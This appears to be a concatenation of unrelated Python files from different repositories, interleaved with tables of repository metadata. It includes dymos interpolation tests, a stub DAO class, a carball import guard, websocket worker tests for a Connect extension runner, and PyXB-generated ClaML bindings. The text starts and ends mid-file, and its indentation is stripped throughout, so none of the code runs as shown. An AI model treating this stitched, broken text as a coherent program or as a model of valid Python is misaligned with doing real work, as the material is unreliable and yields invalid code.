print(p['dt_dstau'])
print(p['state_disc:pos'][:, 0])
print(p['staterate_disc:pos'][:, 0])
print(p['state_disc:pos'][:, 0])
print(p['staterate_disc:pos'][:, 1])
t = np.linspace(0, 10, 100)
x1 = x(t)
xdot1 = f_x(t)
x2 = v(t)
xdot2 = f_v(t)
ax[0].plot(t, x1, 'b-', label='$x$')
ax[0].plot(t, xdot1, 'b--', label='$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:pos'][:, 0], 'bo', label='$X_d:pos$')
ax[0].plot(t_col, p['state_interp_comp.state_col:pos'][:, 0], 'bv', label='$X_c:pos$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:pos'][:, 0], marker='v',
color='None', mec='b', label='$Xdot_c:pos$')
ax[1].plot(t, x2, 'r-', label='$v$')
ax[1].plot(t, xdot2, 'r--', label='$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:pos'][:, 1], 'ro', label='$X_d:vel$')
ax[1].plot(t_col, p['state_interp_comp.state_col:pos'][:, 1], 'rv', label='$X_c:vel$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:pos'][:, 1], marker='v',
color='None', mec='r', label='$Xdot_c:vel$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.state_col:pos'][:, 0], x(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:pos'][:, 0], f_x(t_col))
# Test 2
assert_almost_equal(
p['state_interp_comp.state_col:pos'][:, 1], v(t_col))
assert_almost_equal(
p['state_interp_comp.staterate_col:pos'][:, 1], f_v(t_col))
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_lobatto_vectorized_different_orders(self):
segends = np.array([0.0, 3.0, 10.0])
gd = GridData(num_segments=2,
transcription_order=[3, 5],
segment_ends=segends,
transcription='gauss-lobatto')
p = Problem(model=Group())
states = {'pos': {'units': 'm', 'shape': (2,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:pos'])
X_ivc.add_output('state_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)), units='m')
F_ivc = IndepVarComp()
p.model.add_subsystem('F_ivc', F_ivc, promotes=['staterate_disc:pos'])
F_ivc.add_output('staterate_disc:pos',
val=np.zeros((gd.subset_num_nodes['state_disc'], 2)),
units='m/s')
dt_dtau_ivc = IndepVarComp()
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='gauss-lobatto',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:pos', 'state_interp_comp.state_disc:pos')
p.model.connect('staterate_disc:pos', 'state_interp_comp.staterate_disc:pos')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
segends_disc = np.array((0, 3, 3, 6.5, 10))
p['state_disc:pos'][:, 0] = [x(t) for t in segends_disc] # [0.0, 25.0, 25.0, 100.0]
p['staterate_disc:pos'][:, 0] = [f_x(t) for t in segends_disc]
p['state_disc:pos'][:, 1] = [v(t) for t in segends_disc]
p['staterate_disc:pos'][:, 1] = [f_v(t) for t in segends_disc]
p['dt_dstau'] = [3.0/2., 7.0/2, 7.0/2]
p.run_model()
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=5.0E-5)
def test_state_interp_comp_radau(self):
gd = GridData(num_segments=1,
transcription_order=3,
segment_ends=np.array([0, 10]),
transcription='radau-ps')
p = Problem(model=Group())
states = {'x': {'units': 'm', 'shape': (1,)},
'v': {'units': 'm/s', 'shape': (1,)}}
X_ivc = IndepVarComp()
p.model.add_subsystem('X_ivc', X_ivc, promotes=['state_disc:x', 'state_disc:v'])
X_ivc.add_output('state_disc:x', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m')
X_ivc.add_output('state_disc:v', val=np.zeros(gd.subset_num_nodes['state_disc']),
units='m/s')
dt_dtau_ivc = IndepVarComp()
dt_dtau_ivc.add_output('dt_dstau', val=0.0*np.zeros(gd.subset_num_nodes['col']), units='s')
p.model.add_subsystem('dt_dstau_ivc', dt_dtau_ivc, promotes=['dt_dstau'])
p.model.add_subsystem('state_interp_comp',
subsys=StateInterpComp(transcription='radau-ps',
grid_data=gd,
state_options=states,
time_units='s'))
p.model.connect('state_disc:x', 'state_interp_comp.state_disc:x')
p.model.connect('state_disc:v', 'state_interp_comp.state_disc:v')
p.model.connect('dt_dstau', 'state_interp_comp.dt_dstau')
p.setup(force_alloc_complex=True)
lgr_nodes, lgr_weights = lgr(3, include_endpoint=True)
t_disc = (lgr_nodes + 1.0) * 5.0
t_col = t_disc[:-1]
# Test 1: Let x = t**2, f = 2*t
p['state_disc:x'] = t_disc**2
# Test 1: Let v = t**3-10*t**2, f = 3*t**2 - 20*t
p['state_disc:v'] = t_disc**3-10*t_disc**2
p['dt_dstau'] = 10/2.0
p.run_model()
if SHOW_PLOTS: # pragma: no cover
f, ax = plt.subplots(2, 1)
t_disc = np.array([0, 5, 10])
t_col = np.array([2.5, 7.5])
t = np.linspace(0, 10, 100)
x1 = t**2
xdot1 = 2*t
x2 = t**3 - 10*t**2
xdot2 = 3*t**2 - 20*t
ax[0].plot(t, x1, 'b-', label='$x$')
ax[0].plot(t, xdot1, 'b--', label='$\dot{x}$')
ax[0].plot(t_disc, p['state_disc:x'], 'bo', label='$X_d:x$')
ax[0].plot(t_col, p['state_interp_comp.state_col:x'], 'bv', label='$X_c:x$')
ax[0].plot(t_col, p['state_interp_comp.staterate_col:x'], marker='v', color='None',
mec='b', label='$Xdot_c:x$')
ax[1].plot(t, x2, 'r-', label='$v$')
ax[1].plot(t, xdot2, 'r--', label='$\dot{v}$')
ax[1].plot(t_disc, p['state_disc:v'], 'ro', label='$X_d:v$')
ax[1].plot(t_col, p['state_interp_comp.state_col:v'], 'rv', label='$X_c:v$')
ax[1].plot(t_col, p['state_interp_comp.staterate_col:v'], marker='v', color='None',
mec='r', label='$Xdot_c:v$')
ax[0].legend(loc='upper left', ncol=3)
ax[1].legend(loc='upper left', ncol=3)
plt.show()
# Test 1
assert_almost_equal(
p['state_interp_comp.staterate_col:x'][:, 0], 2*t_col)
# Test 2
assert_almost_equal(
p['state_interp_comp.staterate_col:v'][:, 0], 3*t_col**2 - 20*t_col)
cpd = p.check_partials(compact_print=True, method='cs')
assert_check_partials(cpd, atol=1.0E-5)
if __name__ == '__main__':
unittest.main()
| 37.055024
| 99
| 0.532959
| 2,208
| 15,489
| 3.497736
| 0.072917
| 0.058268
| 0.085459
| 0.045578
| 0.883335
| 0.861453
| 0.852389
| 0.846174
| 0.845267
| 0.829729
| 0
| 0.029881
| 0.299955
| 15,489
| 417
| 100
| 37.143885
| 0.682376
| 0.019498
| 0
| 0.716846
| 0
| 0
| 0.191813
| 0.074484
| 0
| 0
| 0
| 0
| 0.057348
| 1
| 0.028674
| false
| 0
| 0.035842
| 0.014337
| 0.082437
| 0.043011
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21cbfe0f564cedab086fbfd82ee3a2cc479af7fc
| 228
|
py
|
Python
|
DAO/profile_dao.py
|
umagnanasundaram2128/WolfTrack3.0
|
3af060899a886cbbe0871f98d554f5f694b3e0f1
|
[
"MIT"
] | 2
|
2021-09-26T07:33:16.000Z
|
2021-09-30T06:07:47.000Z
|
DAO/profile_dao.py
|
umagnanasundaram2128/WolfTrack3.0
|
3af060899a886cbbe0871f98d554f5f694b3e0f1
|
[
"MIT"
] | 36
|
2021-09-26T23:32:19.000Z
|
2021-09-30T22:54:39.000Z
|
DAO/profile_dao.py
|
ArpithaVijayakumar/WolfTrack
|
2cfef76fa8235625ef66650321d182fc929b8eda
|
[
"MIT"
] | 7
|
2021-10-05T23:51:03.000Z
|
2021-11-15T03:34:01.000Z
|
from sql_helper import sql_helper
class profile_dao:
def create_profile(self):
pass
def get_profile(self):
pass
def update_profile(self):
pass
def delete_profile(self):
pass
| 13.411765
| 33
| 0.627193
| 29
| 228
| 4.689655
| 0.482759
| 0.323529
| 0.441176
| 0.397059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315789
| 228
| 16
| 34
| 14.25
| 0.871795
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0.1
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
0dfd0b6b79ad5b957197b9f7dfcf8fe13a2bef78
| 223
|
py
|
Python
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 119
|
2018-09-14T02:14:19.000Z
|
2022-03-06T05:06:54.000Z
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 207
|
2018-09-06T18:53:06.000Z
|
2022-02-12T22:39:36.000Z
|
carball/__init__.py
|
unitedroguegg/carball
|
4767f2c5d195b7d5d60e6a5575415262803acef7
|
[
"Apache-2.0"
] | 44
|
2018-09-10T16:54:13.000Z
|
2022-02-19T03:07:50.000Z
|
try:
from carball.decompile_replays import decompile_replay
from carball.decompile_replays import analyze_replay_file
except ModuleNotFoundError as e:
print("Not importing functions due to missing packages:", e)
| 44.6
| 64
| 0.811659
| 29
| 223
| 6.068966
| 0.724138
| 0.125
| 0.227273
| 0.306818
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143498
| 223
| 5
| 64
| 44.6
| 0.921466
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
df40571510307119e466305fffb65adf4405f177
| 16,906
|
py
|
Python
|
tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
import pytest
from websockets.exceptions import ConnectionClosedError, WebSocketException
from connect.eaas.dataclasses import (
CapabilitiesPayload,
ConfigurationPayload,
Message,
MessageType,
ResultType,
TaskCategory,
TaskPayload,
TaskType,
)
from connect.eaas.extension import Extension, ProcessingResponse
from connect.eaas.worker import Worker
from tests.utils import WSHandler
@pytest.mark.asyncio
async def test_capabilities_configuration(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = Message(
MessageType.CONFIGURATION,
ConfigurationPayload(
{
'var1': 'value1',
'var2': 'value2',
},
'token',
),
).to_json()
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
@pytest.mark.asyncio
async def test_pr_task(mocker, ws_server, unused_port, httpx_mock):
pr_data = {'id': 'PR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=f'https://127.0.0.1:{unused_port}/public/v1/requests/PR-000',
json=pr_data,
)
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
def process_asset_purchase_request(self, request):
assert request == pr_data
return ProcessingResponse.done()
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING,
'PR-000',
)).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'receive'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
handler.assert_received(
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING,
'PR-000',
result=ResultType.SUCCESS,
)).to_json(),
)
@pytest.mark.asyncio
async def test_tcr_task(mocker, ws_server, unused_port, httpx_mock):
tcr_data = {'id': 'TCR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=f'https://127.0.0.1:{unused_port}/public/v1/tier/config-requests/TCR-000',
json=tcr_data,
)
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING: ['pending'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
def process_tier_config_setup_request(self, request):
assert request == tcr_data
return ProcessingResponse.done()
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING,
'TCR-000',
)).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'receive'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
handler.assert_received(
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING,
'TCR-000',
result=ResultType.SUCCESS,
)).to_json(),
)
@pytest.mark.asyncio
async def test_pause(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.PAUSE).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.paused is True
worker.run_event.clear()
await task
@pytest.mark.asyncio
async def test_resume(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.PAUSE).to_json(),
Message(MessageType.RESUME).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.paused is False
worker.run_event.clear()
await task
@pytest.mark.asyncio
async def test_shutdown(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.SHUTDOWN).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.run_event.is_set() is False
@pytest.mark.asyncio
async def test_connection_closed_error(mocker, ws_server, unused_port, caplog):
mocker.patch('connect.eaas.worker.get_extension_class')
mocker.patch('connect.eaas.worker.get_extension_type')
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
[],
)
async with ws_server(handler):
worker = Worker(secure=False)
worker.send = mocker.AsyncMock(side_effect=ConnectionClosedError(1006, 'disconnected'))
with caplog.at_level(logging.INFO):
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
assert (
f'Disconnected from: ws://127.0.0.1:{unused_port}'
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002, retry in 1s'
) in caplog.text
@pytest.mark.asyncio
async def test_connection_websocket_exception(mocker, ws_server, unused_port, caplog):
mocker.patch('connect.eaas.worker.get_extension_class')
mocker.patch('connect.eaas.worker.get_extension_type')
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
[],
)
async with ws_server(handler):
worker = Worker(secure=False)
worker.send = mocker.AsyncMock(side_effect=WebSocketException())
with caplog.at_level(logging.INFO):
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
assert 'Unexpected websocket exception' in caplog.text
@pytest.mark.asyncio
async def test_start_stop(mocker, ws_server, unused_port, caplog):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
['receive', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
with caplog.at_level(logging.INFO):
await worker.start()
await asyncio.sleep(.1)
assert 'Control worker started' in caplog.text
worker.stop()
assert 'Control worker stopped' in caplog.text
| 31.077206
| 95
| 0.592926
| 1,829
| 16,906
| 5.285949
| 0.08748
| 0.034133
| 0.049235
| 0.06144
| 0.909806
| 0.903393
| 0.894187
| 0.889119
| 0.87681
| 0.868329
| 0
| 0.039534
| 0.27434
| 16,906
| 543
| 96
| 31.134438
| 0.748533
| 0
| 0
| 0.7473
| 0
| 0.006479
| 0.252691
| 0.113037
| 0
| 0
| 0
| 0
| 0.030238
| 1
| 0.019438
| false
| 0
| 0.017279
| 0.015119
| 0.071274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df60b95a7baeb5b1681275e5d60fc4d441afe7bb
| 194,755
|
py
|
Python
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | 7
|
2019-05-14T07:57:53.000Z
|
2021-06-07T08:00:04.000Z
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | 1
|
2021-02-21T13:10:41.000Z
|
2021-02-21T13:10:41.000Z
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | null | null | null |
# ./claml.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:e92452c8d3e28a9e27abfc9994d2007779e7f4c9
# Generated 2019-04-05 19:48:40.632175 by PyXB version 1.2.6 using Python 3.6.7.final.0
# Namespace AbsentNamespace0
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:0c295e4a-57cb-11e9-80c6-e86a649bf8c8')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import pyxb.binding.xml_
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.CreateAbsentNamespace()
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 121, 16)
_Documentation = None
STD_ANON._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON, enum_prefix=None)
STD_ANON.true = STD_ANON._CF_enumeration.addEnumeration(unicode_value='true', tag='true')
STD_ANON.false = STD_ANON._CF_enumeration.addEnumeration(unicode_value='false', tag='false')
STD_ANON._InitializeFacetMap(STD_ANON._CF_enumeration)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: [anonymous]
class STD_ANON_ (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 194, 16)
_Documentation = None
STD_ANON_._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON_, enum_prefix=None)
STD_ANON_.true = STD_ANON_._CF_enumeration.addEnumeration(unicode_value='true', tag='true')
STD_ANON_.false = STD_ANON_._CF_enumeration.addEnumeration(unicode_value='false', tag='false')
STD_ANON_._InitializeFacetMap(STD_ANON_._CF_enumeration)
